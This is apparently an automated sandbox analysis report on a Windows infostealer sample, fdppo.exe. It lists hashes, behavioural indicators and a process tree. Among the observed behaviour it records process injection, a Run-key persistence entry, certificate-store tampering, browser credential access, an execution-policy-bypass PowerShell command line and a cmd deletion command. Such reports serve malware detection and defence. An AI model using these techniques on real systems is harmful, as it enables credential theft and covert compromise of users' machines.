Analysis
max time kernel: 150s
max time network: 143s
platform: windows7_x64
resource: win7
submitted: 13-07-2020 14:36

Static task: static1

Behavioral task: behavioral1
Sample: fdppo.exe
Resource: win7 (windows7_x64)
0 signatures, 0 seconds

Behavioral task: behavioral2
Sample: fdppo.exe
Resource: win10 (windows10_x64)
0 signatures, 0 seconds
General
Target: fdppo.exe
Size: 101KB
MD5: 082348ffb2977a0762e3e5d6f4a47ff4
SHA1: a63f12bba792fd01307373a7565b96549eb9f3c8
SHA256: 8f9fcdd00e43b8845139ba38f9d4f164e526736578eab199e7f7af5d8179f01c
SHA512: ac00b157a3ae8af9502658c2fa72d80eb871f4ca9ee6b36393c526fbe0d35383855633bc871623c3088f3cdbd75a537b52ef24d8d1995353896637c3a27cf91c
Malware Config

Signatures

Modifies system certificate store
Processes:
powershell.exe
description | ioc | process
Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13\Blob = [certificate hex blob removed] | powershell.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13 | powershell.exe
Suspicious use of AdjustPrivilegeToken 4 IoCs
Processes: fdppo.exe, powershell.exe, MSBuild.exe, colorcpl.exe
description | pid | process
Token: SeDebugPrivilege | 1164 | fdppo.exe
Token: SeDebugPrivilege | 1608 | powershell.exe
Token: SeDebugPrivilege | 1084 | MSBuild.exe
Token: SeDebugPrivilege | 1828 | colorcpl.exe
System policy modification 1 TTPs 1 IoCs
Processes: colorcpl.exe
description | ioc | process
Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer | colorcpl.exe
Suspicious behavior: MapViewOfSection 8 IoCs
Processes: MSBuild.exe, colorcpl.exe
pid | process | count
1084 | MSBuild.exe | 4
1828 | colorcpl.exe | 4
Suspicious use of FindShellTrayWindow 5 IoCs
Processes: Explorer.EXE
pid | process | count
1336 | Explorer.EXE | 5
Modifies Internet Explorer settings
Processes: colorcpl.exe
description | ioc | process
Key created | \Registry\User\S-1-5-21-1131729243-447456001-3632642222-1000\SOFTWARE\Microsoft\Internet Explorer\IntelliForms\Storage2 | colorcpl.exe
Checks whether UAC is enabled
Processes: Explorer.EXE
description | ioc | process
Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | Explorer.EXE
Suspicious use of WriteProcessMemory 24 IoCs
Processes: fdppo.exe, powershell.exe, Explorer.EXE, colorcpl.exe
description | pid | process | target process | count
PID 1164 wrote to memory of 1608 | 1164 | fdppo.exe | powershell.exe | 4
PID 1608 wrote to memory of 1084 | 1608 | powershell.exe | MSBuild.exe | 7
PID 1336 wrote to memory of 1828 | 1336 | Explorer.EXE | colorcpl.exe | 4
PID 1828 wrote to memory of 1852 | 1828 | colorcpl.exe | cmd.exe | 4
PID 1828 wrote to memory of 1636 | 1828 | colorcpl.exe | Firefox.exe | 5
Suspicious behavior: EnumeratesProcesses 29 IoCs
Processes: powershell.exe, MSBuild.exe, colorcpl.exe
pid | process | count
1608 | powershell.exe | 2
1084 | MSBuild.exe | 3
1828 | colorcpl.exe | 24
Suspicious use of SetThreadContext 4 IoCs
Processes: powershell.exe, MSBuild.exe, colorcpl.exe
description | pid | process | target process
PID 1608 set thread context of 1084 | 1608 | powershell.exe | MSBuild.exe
PID 1084 set thread context of 1336 | 1084 | MSBuild.exe | Explorer.EXE
PID 1084 set thread context of 1336 | 1084 | MSBuild.exe | Explorer.EXE
PID 1828 set thread context of 1336 | 1828 | colorcpl.exe | Explorer.EXE
Adds Run entry to policy start application 2 TTPs 2 IoCs
Processes: colorcpl.exe
description | ioc | process
Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run | colorcpl.exe
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\8PPXV4W006 = "C:\\Program Files (x86)\\Zadfhaf\\usery4nh.exe" | colorcpl.exe
Drops file in Program Files directory 1 IoCs
Processes: colorcpl.exe
description | ioc | process
File opened for modification | C:\Program Files (x86)\Zadfhaf\usery4nh.exe | colorcpl.exe
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
Blacklisted process makes network request 1 IoCs
Processes: powershell.exe
flow | pid | process
9 | 1608 | powershell.exe
Suspicious use of SendNotifyMessage 4 IoCs
Processes: Explorer.EXE
pid | process | count
1336 | Explorer.EXE | 4
Processes

Level 1: C:\Windows\Explorer.EXE
  Command line: C:\Windows\Explorer.EXE
  PID: 1336
  - Suspicious use of FindShellTrayWindow
  - Checks whether UAC is enabled
  - Suspicious use of WriteProcessMemory
  - Suspicious use of SendNotifyMessage

  Level 2: C:\Users\Admin\AppData\Local\Temp\fdppo.exe
    Command line: "C:\Users\Admin\AppData\Local\Temp\fdppo.exe"
    PID: 1164
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    Level 3: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy bypass -w 1 /e [base64-encoded command removed]
      PID: 1608
      - Modifies system certificate store
      - Suspicious use of AdjustPrivilegeToken
      - Suspicious use of WriteProcessMemory
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of SetThreadContext
      - Blacklisted process makes network request

      Level 4: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
        Command line: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
        PID: 1084
        - Suspicious use of AdjustPrivilegeToken
        - Suspicious behavior: MapViewOfSection
        - Suspicious behavior: EnumeratesProcesses
        - Suspicious use of SetThreadContext

  Level 2: C:\Windows\SysWOW64\colorcpl.exe
    Command line: "C:\Windows\SysWOW64\colorcpl.exe"
    PID: 1828
    - Suspicious use of AdjustPrivilegeToken
    - System policy modification
    - Suspicious behavior: MapViewOfSection
    - Modifies Internet Explorer settings
    - Suspicious use of WriteProcessMemory
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of SetThreadContext
    - Adds Run entry to policy start application
    - Drops file in Program Files directory

    Level 3: C:\Windows\SysWOW64\cmd.exe
      Command line: /c del "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
      PID: 1852

    Level 3: C:\Program Files\Mozilla Firefox\Firefox.exe
      Command line: "C:\Program Files\Mozilla Firefox\Firefox.exe"
      PID: 1636